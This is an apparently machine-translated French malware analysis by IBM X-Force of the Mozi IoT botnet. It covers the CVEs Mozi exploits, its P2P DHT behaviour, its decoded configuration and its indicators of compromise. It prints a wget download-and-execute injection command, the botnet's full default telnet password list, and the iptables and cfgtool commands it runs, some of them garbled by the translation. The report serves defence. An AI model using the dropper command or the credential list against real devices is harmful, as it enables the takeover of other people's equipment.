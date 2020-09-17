IBM X-Force a découvert qu'un acteur relativement nouveau dans le domaine des menaces, le botnet Mozi s'est imposé sur les appareils de l'Internet des objets (IoT).
Ce logiciel malveillant est actif depuis fin 2019 et présente des similitudes de code avec Mirai et ses variantes. Mozi a représenté près de 90 % du trafic réseau IdO observé entre octobre 2019 et juin 2020.
Ce rachat surprenant s'est accompagné d'une forte augmentation de l'activité globale des botnets IdO, ce qui suggère que Mozi n'a pas retiré ses concurrents du marché. Au contraire, elle a inondé le marché, éclipsant l’activité des autres variantes. Dans l'ensemble, les instances d'attaques IdO combinées d'octobre 2019, lorsque les attaques ont commencé à augmenter de manière notable, jusqu'à juin 2020, sont 400 % plus élevées que les instances d'attaques IdO combinées des deux années précédentes.
Cette augmentation des attaques IdO peut être due à un certain nombre de causes, mais peut en partie résulter d’un environnement IdO en constante expansion pour les acteurs de la menace cibler. Environ 31 milliards d’appareils IdO sont déployés dans le monde, et le taux de déploiement IdO est désormais de 127 appareils par seconde.
Les attaquants exploitent ces appareils depuis un certain temps déjà, notamment via le botnet Mirai. L'équipe IBM X-Force Incident Response and Intelligence Services (IRIS) le suit depuis près de quatre ans. Alors pourquoi ce saut soudain ? Les recherches IBM suggèrent que Mozi continue à connaître du succès, en grande partie grâce à l'utilisation d'attaques par injection de commandes (CMDi), qui sont souvent dues à une mauvaise configuration des appareils IdO. La croissance continue de l’utilisation de l’IdO et les mauvais protocoles de configuration sont les responsables probables de cette hausse. Cette augmentation peut avoir été alimentée par le fait que les réseaux d'entreprise sont plus souvent accessibles à distance en raison de COVID-19.
Un botnet IdO peut être utilisé pour effectuer des attaques par déni de service distribué (DDoS), voler des données et envoyer du spam. Il existe une pléthore de différents types d’appareils IdO à exploiter :
Cette grande surface d’attaque laisse les Entreprises vulnérables aux botnets IdO. Ajoutez à cela les failles de sécurité que présentent souvent ces appareils prêts à l'emploi et les pratiques de durcissement laxistes lors du déploiement. La vulnérabilité la plus notable dans l'IdO provient des attaques CMDi.
Presque toutes les attaques IdO observées par IBM ont tenté d'utiliser des attaques CMDi pour obtenir un accès initial à l'appareil. Si le point de terminaison ciblé était un appareil IdO et est vulnérable à ces attaques, la charge utile a été téléchargée et exécutée.
Les attaques CMDi sont extrêmement populaires contre les appareils IdO pour plusieurs raisons. Tout d’abord, les systèmes intégrés IdO contiennent généralement une interface Web et une interface de débogage laissées par le développement de microprogrammes qui peuvent être exploitées. Deuxièmement, les modules PHP intégrés dans les interfaces web de l'IdO peuvent être exploités pour donner à des acteurs malveillants une capacité d'exécution à distance. Et troisièmement, les interfaces IdO sont souvent vulnérables lorsqu’elles sont déployées, car les administrateurs ne parviennent pas à durcir les interfaces en nettoyant l'entrée attendue. Cela permet aux acteurs de la menace d'entrée des commandes shell telles que « wget ».
Notre analyse a révélé que le botnet Mozi tire parti de CMDi en utilisant une commande shell « wget », puis en modifiant les autorisations pour permettre à l'acteur de la menace d'interagir avec le système concerné. En voici quelques exemples :
wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a ; chmod 777 /var/tmp/mozi.a ; rm -rf /var/tmp/mozi.a
Si l’hôte était vulnérable à CMDi, cette commande téléchargeait et exécutait un fichier appelé « mozi.a ». Notre analyse de cet échantillon particulier indique que le fichier s'exécute sur un microprocesseur sans étages pipelinés interverrouillés (MIPS). Il s’agit d’une extension comprise par les machines exécutant une architecture d’ordinateur à ensemble d’instructions réduit (RISC), qui est répandue sur de nombreux appareils IdO. Une fois que l’attaquant obtient un accès complet à l’appareil via le botnet, le niveau du firmware peut être modifié et des logiciels malveillants supplémentaires peuvent être implantés sur l’appareil.
Bien que cet exemple cite un vecteur bien connu, il peut continuer à être efficace pour deux raisons principales. Premièrement, les nouvelles vulnérabilités permettent une mise à jour constante des tentatives d'exploitation via CMDi, et la lenteur de la mise en œuvre des correctifs peut être exploitée. Deuxièmement, cette activité est facilement automatisable, ce qui permet aux acteurs de la menace de cibler rapidement et à moindre coût un large éventail d’appareils.
L'infrastructure du botnet Mozi semble provenir principalement de Chine, représentant 84 % de l'infrastructure observée. Ce fait concorde avec d'autres recherches open source sur l'activité de l'IdO en 2020.
Vous trouverez ci-dessous une liste des vulnérabilités qu'IBM a observé que le botnet Mozi tentait d'exploiter :
|Vulnérabilité
|Appareil affecté
|CVE-2017-17215
|Huawei HG532
|CVE-2018-10561 / CVE-2018-10562
|Routeurs GPON
|CVE-2014-8361
|Appareils utilisant le SDK Realtek
|Routeur sans fil Eir D1000 RCI
|Routeur sans fil Eir D1000
|CVE-2008-4873
|Sepal SPBOARD
|CVE-2016-6277
|Netgear R7000 / R6400
|Netgear setup.cgi RCE non authentifié
|Netgear DGN1000
|Exécution des commandes DVR MVPower
|DVR MVPower TV-7104HE
|CVE-2015-2051
|Appareils D-Link
|Exécution de commandes SOAP UPnP D-Link
|Appareils D-Link
|Fournisseurs de systèmes de vidéosurveillance RCE
|Plusieurs fournisseurs de systèmes de vidéosurveillance (DVR)
Le botnet Mozi est un botnet peer-to-peer (P2P) basé sur le protocole DSHT (distributed sloppy hash table), qui peut se propager via l'exploitation de dispositifs IdO et de mots de passe telnet faibles.
Une fois exécuté, le botnet Mozi tente de lier le port UDP local 14737. L'exemple lit /proc/net/tcp ou /proc/net/raw pour trouver et tuer les processus qui utilisent les ports 1536 et 5888. L'exemple vérifie si le fichier /usr/bin/python existe. S'il existe, l'exemple change le nom de son processus en sshd. Dans le cas contraire, l'échantillon le remplace par dropbear.
Le botnet Mozi est connu pour posséder au moins deux caractéristiques uniques. Il utilise l’ECDSA384 (algorithme de signature numérique de courbe elliptique 384) pour Verify son intégrité. De plus, il réutilise des parties du code Gafgyt.
Il contient des nœuds publics DHT codés en dur, qui peuvent être utilisés pour rejoindre le réseau P2P. Ces nœuds sont :
dht[.]transmissionbt[.]com:6881 routeur[.]bittorrent[.]com:6881 routeur[.]utorrent[.]com:6881 bttracker[.]debian[.]org :6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Le botnet Mozi possède quatre capacités principales. Il peut mener une attaque DDoS (HTTP, TCP, UDP) ; mener des attaques par exécution de commande ; télécharger et exécuter le contenu malveillant à partir de l’URL spécifiée ; et recueillir des informations sur les bots.
Le tableau ci-dessous contient des informations détaillées sur les fichiers analysés. Les détails comprennent à la fois les fichiers soumis et les fichiers résiduels. (Les fichiers résiduels sont des fichiers extraits statiquement ou dynamiquement lors d’une analyse de logiciels malveillants.) Les données incluent le nom du fichier, les catégories de fichier telles que déterminées par analyse, le hachage du fichier et la parenté des fichiers par rapport aux autres fichiers du tableau.
|Nom du fichier
|Catégorie de fichier
|Fichier Hash
|Parent
|mozi.m
|Botnet
|4dde761681684d7edad4e5e1ffdb940b
|S/O
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Botnet
|86d42d968d3d12c36722e16c78e49ffb
|mozi.m
|mozi.a
|Botnet
|9a111588a7db15b796421bd13a949cd4
|S/O
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Botnet
|dd4b6f3216709e193ed9f06c37bcc3890
|mozi.a
Lors de l'exécution, l'exemple tente de lier le port UDP local 14737. L'exemple lit /proc/net/tcp ou /proc/net/raw pour trouver et tuer les processus qui utilisent les ports 1536 et 5888. L'exemple vérifie si le fichier /usr/bin/python existe. S'il existe, l'exemple change le nom de son processus en sshd. Dans le cas contraire, l'échantillon le remplace par dropbear :
L’exemple tente également de mettre à jour la liste de contrôle d’accès pour bloquer SSH et telnet afin d’empêcher d’autres botnets de les utiliser.
iptables -I entrée -p tcp --destination-port 22 -j DROP iptables -I entrée -p tcp --destination-port 23 -j DROP iptables -I entrée -p tcp --destination-port 2323 -j DROP iptables -I production -p tcp --source-port 22 -j DROP iptables -I production -p tcp --source-port 23 -j DROP iptables -I production -p tcp --source-port 2323 -j DROP
Il sélectionne également de manière aléatoire des ports codés en dur dans l'iptable :
Le botnet Mozi utilise un protocole DHT personnalisé pour développer son réseau P2P. Le processus d'intégration d'un nouveau nœud Mozi dans le réseau DHT est le suivant :
dht[.]transmissionbt[.]com:6881 routeur[.]bittorrent[.]com:6881 routeur[.]utorrent[.]com:6881 bttracker[.]debian[.]org :6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
L'échantillon doit générer un identifiant pour le nœud actuel. Selon un rapport 360 de Netlab sur le Mozi, « l’ID est de 20 octets et se compose du préfixe 888888 intégré dans l’échantillon ou du préfixe spécifié par le fichier de configuration [hp], ainsi que d’une chaîne générée aléatoirement ». Le fichier de configuration est présenté ci-dessous :.
[ss]bot[/ss][hp]88888888[/hp][count]http[ :]//ia[.]51[.]LA/GO1 ?id=19894027&pu=http%3a%2f%2fbaidu.com/[IDP][/count]
Pour rejoindre le réseau DHT, l’exemple envoie une requête ping à ces nœuds publics DHT codés en dur. La requête ping avec identifiant de nœud est affichée dans le trafic dans la figure Wireshark ci-dessous
Les deux échantillons sont conditionnés à l'aide d'un packer UPX personnalisé. Elle efface la valeur de p_file_size et p_blocksize à zéro dans p_info structure.
L'exemple contient le fichier de configuration codé en dur ci-dessous :
Il contient quatre sections :
Les données de configuration sont encodées à l’aide d’une clé XOR codée en dur, 4E665A8F80C8AC238DAC4706D54F6F7E. Les données de configuration décodées sont présentées ci-dessous :
[ss]bot[/ss][hp]88888888[/hp][count]http[ :]//ia[.]51[.]LA/GO1 ?id=19894027&pu=http%3a%2f%2fbaidu.com/[IDP][/count]
Les données de configuration prennent en charge plusieurs commandes étiquetées comme suit :
|Tag (commande)
|Description
|[ss]
|Rôle du bot
|[ssx]
|activer/désactiver le tag [ss]
|[cpu]
|Architecture du processeur
|[cpux]
|activer/désactiver l'étiquette [cpu]
|[nd]
|nouveau nœud DHT
|[hp]
|Préfixe de hachage du nœud DHT
|[atk]
|Type d'attaque DDoS
|[ver]
|Valeur en section V dans le protcol DHT
|[sv]
|Mettre à jour la configuration
|[ud]
|Mise à jour du bot
|[dr]
|Téléchargez et exécutez la charge utile à partir de l'URL spécifiée
|[rn]
|Exécuter la commande spécifiée
|[dip]
|ip :port pour télécharger Mozi bot
|[idp]
|rapport bot
|[compte]
|URL utilisée pour signaler le bot
Le botnet Mozi réutilise certaines parties du code Gafgyt lors de l'attaque DDoS. Il prend en charge plusieurs types d'attaques DDoS telles que HTTP, TCP et UDP.
La signature ECDSA384 1 est utilisée pour Verify la valeur de hachage des données de configuration. La clé publique codée en dur utilisée pour Verify est la suivante :
4C A6 FB CC F8 9B 12 1F 49 64 4D 2F 3C 17 D0 B8 E9 7D 24 24 F2 DD B1 47 E9 34 D2 C2 BF 07 AC 53 22 5F D8 92 FE ED 5F A3 C9 5B 6A 16 BE 84 40 77 88
Il est encodé avec la clé XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clé publique décodée est :
02 c0 a1 43 78 53 be 3c c4 c8 0a 29 e9 58 bf c6 a7 1b 7e ab 72 15 1d 64 64 98 95 c4 6a 48 c3 2d 6c 39 82 1d 7e 25 f3 80 44 f7 2d 10 6b cb 2f 06
La version de la configuration détermine à quel moment le bot doit être mis à jour. Il mettra à jour le bot lorsque cette valeur est supérieure à sa valeur actuelle. ECDSA384 signature 2 sert à vérifier ces trois premières parties du fichier de configuration. La clé publique codée en dur utilisée pour Verify est la suivante :
4C B3 8F 68 C1 26 70 EB 9D C1 68 4E D8 4B 7D 5F 69 5F 9D CA 8D E2 7D 63 FF AD 96 8D 18 8B 79 1B 38 31 9B 12 69 73 A9 2E B6 63 29 76 AC 94 A 9E
Il est encodé avec la clé XOR 4E665A8F80C8AC238DAC4706D54F6F7E. La clé publique décodée est :
02 d5 d5 e7 41 ee dc c8 10 6d 2f 48 0d 04 12 21 27 39 c7 45 0d 2a d1 40 72 01 d1 8b cd c4 16 65 76 57 c1 9d e9 bb 05 0d 3b cf 6e 70 79 60 f1 ea Ef
En plus des vulnérabilités que le botnet Mozi exploite pour accéder à l’appareil victime, le botnet Mozi peut également forcer les identifiants telnet en utilisant une liste codée en dur :
root admin CUAdmin default rapport super telnetadmin ! !! Huawei keomeo support CMCCAdmin e8telnet e8ehome1 e8ehome user mother Administrator service supervisor guest admin1 administrator 666666 888888 ubnt tech xc3511 vizxv Pon521 e2008jl r@p8p0r+ GM8182 gpon Zte521 hg2x0 epicrouter conexant xml-p adminHW 2010vesta 2011vesta plumeria0077 cat1029 123456 54321 hi3518 password 12345 fucker pass admin1234 11 smcadmin 1234 klv123 klv1234 zte jvbzd anko zlxx 7ujMko0vizxv 7ujMko0admin system ikwb dreambox realtek 00000000 1111111 xml-ph-00
Une force brute de connexion telnet utilisée par l'échantillon est la suivante :
Mozi.m et Mozi.a
Réseau
dht[.]transmissionbt[.]com:6881 routeur[.]bittorrent[.]com:6881 routeur[.]utorrent[.]com:6881 bttracker[.]debian[.]org :6881 212[.]129[.]33[.]59:6881 82[.]221[.]103[.]244:6881 130[.]239[.]18[.]159:6881 87[.]98[.]162[.]88:6881
Cordes notables (décompressées)
8.8.8.8 /proc/net/route Mozilla/4.0 (Compatible ; MSIE 8.0 ; Windows NT 5.2 ; Trident/6.0) Mozilla/4.0 (compatible ; MSIE 10.0 ; Windows NT 6.1 ; Trident/5.0) Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 5.1 ; pl) Opera 11.00 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.0 ; fr) Opera 11.00 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.0 ; et) Opera 11.00 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.1 ; de) Opera 11.01 Mozilla/4.0 (compatible ; MSIE 8.0 ; Windows NT 6.1 ; fr) Opera 11.00 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 10.0 ; Win64 ; x64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/51.0.2704.79 Safari/537.36 Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; rv :45.0) Gecko/20100101 Firefox/45.0 Mozilla/5.0 (iPhone ; CPU iPhone OS 8_4 comme Mac OS X) AppleWebKit/600.1.4 (KHTML, comme Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4 Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; rv:41.0) Gecko/20100101 Firefox/41.0 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/45.0.2454.101 Safari/537.36 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/46.0.2490.80 Safari/537.36 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, comme Gecko) Version/9.0 Safari/601.1.56 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, comme Gecko) Version/9.0.1 Safari/601.2.7 Mozilla/5.0 (Windows NT 6.1 ; WOW64 ; Trident/7.0 ; rv:11.0) comme Gecko Mozilla/4.0 (compatible ; MSIE 6.1 ; Windows XP) Opera/9.80 (Windows NT 5.2 ; U ; ru) Presto/2.5.22 Version/10.51 Opera/9.80 (X11 ; Linux i686 ; Ubuntu/14.10) Presto/2.12.388 Version/12.16 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, comme Gecko) Version/7.0.3 Safari/7046A194A Mozilla/5.0 (Windows NT 10.0 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.102 Safari/537.36 Mozilla/5.0 (Windows NT 6.1 ; WOW64) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.94 Safari/537.36 Mozilla/5.0 (Linux ; Android 4.4.3) AppleWebKit/537.36 (KHTML, comme Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36 Mozilla/5.0 (Linux ; Android 4.4.3 ; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, comme Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 Mozilla/4.0 (compatible ; MSIE 8.0 ; X11 ; Linux x86_64 ; pl) Opera 11.00 Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows 98 ; .NET CLR 3.0.04506.30) Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 5.1 ; Trident/5.0) Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.0 ; Trident/4.0 ; GTB7.4 ; InfoPath.3 ; SV1 ; .NET CLR 3.4.53360 ; WOW64 ; en-US) Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.1 ; Trident/4.0 ; FDM ; MSIE Crawler ; Media Center PC 5.0) Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.1 ; Trident/4.0 ; GTB7.4 ; InfoPath.2 ; SV1 ; .NET CLR 4.4.58799 ; WOW64 ; en-US) Mozilla/4.0 (compatible ; MSIE 9.0 ; Windows NT 6.1 ; Trident/5.0 ; FunWebProducts) Mozilla/5.0 (Macintosh ; Intel Mac OS X 10.6 ; rv :25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10.8 ; rv :21.0) Gecko/20100101 Firefox/21.0 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10.8 ; rv :24.0) Gecko/20100101 Firefox/24.0 Mozilla/5.0 (Macintosh ; Intel Mac OS X 10_10 ; rv :33.0) Gecko/20100101 Firefox/33.0 OBTENIR TÊTE PUBLIER . /config /tmp/config cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL “http://127.0.0.1″>http://127.0.0.1” cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword “acsMozi” iptables -I entrée -p tcp --destination-port 35000 -j DROP iptables -I entrée -p tcp --destination-port 50023 -j DROP iptables -I production -p tcp --source-port 50023 -j DROP iptables -I production -p tcp --source-port 35000 -j DROP iptables -I entrée -p tcp --destination-port 7547 -j DROP iptables -I production -p tcp --source-port 7547 -j DROP [cpux] [/cpux] [processeur] [/cpu] [ssx] [/ssx] [ss] [/ss] aucun [sv] [/sv] [rn] [/rn] courir: [nd] [/nd] /tmp /var /temp iptables -I entrée -p udp --destination-port %d -j ACCEPT iptables -I production -p udp --source-port %d -j ACCEPT iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT 0.0.0.0 [idp] Ce nœud n'accepte pas les annonces. dht.transmissionbt.com:6881 router.bittorrent.com:6881 router.utorrent.com:6881 bttracker.debian.org:6881 212.129.33.59:6881 82.221.103.244:6881 130.239.18.159:6881 87.98.162.88:6881
Le paysage des botnets IoT continue d'évoluer et les données d'IBM Security suggèrent que les acteurs de la menace restent actifs dans cet espace. Alors que de nouveaux groupes de botnets, tels que Mozi, intensifient leurs opérations et que l'activité globale de l'IdO augmente, les entreprises utilisant des dispositifs IdO doivent être conscientes de l'évolution de la menace. IBM voit de plus en plus d’appareils IdO d’entreprise sous le feu des pirates informatiques. L'injection de commandes reste le principal vecteur d'infection choisi par les acteurs de la menace, ce qui rappelle combien il est important de modifier les paramètres par défaut des appareils et d'utiliser des tests d'intrusion efficaces pour trouver et appliquer des correctifs dans le blindage.
Métadonnées Mozi.m
|Nom de fichier :
|Mozi.m
|Taille de fichier :
|108 808
|MD5 :
|4dde761681684d7edad4e5e1ffdb940b
|SHA1 :
|2327be693bc11a618c380d7d3abc2382d870d48b
|SHA256 :
|d546509ab6670f9ff31783ed72875dfc0f37fa2b666bd5870eecaaed2ebea4a8
|Type de fichier :
|Exécutable ELF 32 bits MSB, MIPS, MIPS-I version 1 (SYSV), lié statiquement, dépouillé
|Catégorie :
|Botnet
|Nom IRIS :
|Mozi
|Autres noms :
Mozi.a Metadata
|Nom de fichier :
|Mozi.a
|Taille de fichier :
|95 268
|MD5 :
|9a111588a7db15b796421bd13a949cd4
|SHA1 :
|034c8c51a58be11ca620ce3eb0d43d5a59275d2f
|SHA256 :
|e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
|Type de fichier :
|Exécutable ELF 32 bits LSB, ARM, version 1, lié statiquement, dépouillé
|Catégorie :
|Botnet
|Nom IRIS :
|Mozi
|Autres noms :
Métadonnées 5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Nom de fichier :
|d546_unpacked
|Taille de fichier :
|266 108
|MD5 :
|86d42d968d3d12c36722e16c78e49ffb
|SHA1 :
|ba733ab3bfc6b4afcf784f95aa9bee99fb665a71
|SHA256 :
|5738f1bc69e78d234dd04e2fbfcfb4b86403fc9117b133cf1bb7cda67e7aef0a
|Type de fichier :
|Exécutable ELF 32 bits MSB, MIPS, MIPS-I version 1 (SYSV), lié statiquement, dépouillé
|Catégorie :
|Botnet
|Nom IRIS :
|Mozi
|Autres noms :
83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d Métadonnées
|Nom de fichier :
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Taille de fichier :
|212 464
|MD5 :
|dd4b6f3216709e193ed9f06c37bcc389
|SHA1 :
|758ba1ab22dd37f0f9d6fd09419bfef44f810345
|SHA256 :
|83441d77abb6cf328e77e372dc17c607fb9c4a261722ae80d83708ae3865053d
|Type de fichier :
|b'ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped'' (exécutable 32 bit LSB, ARM, version 1, lié statiquement, dépouillé)
|Catégorie :
|Botnet
|Nom IRIS :
|Mozi
|Autres noms :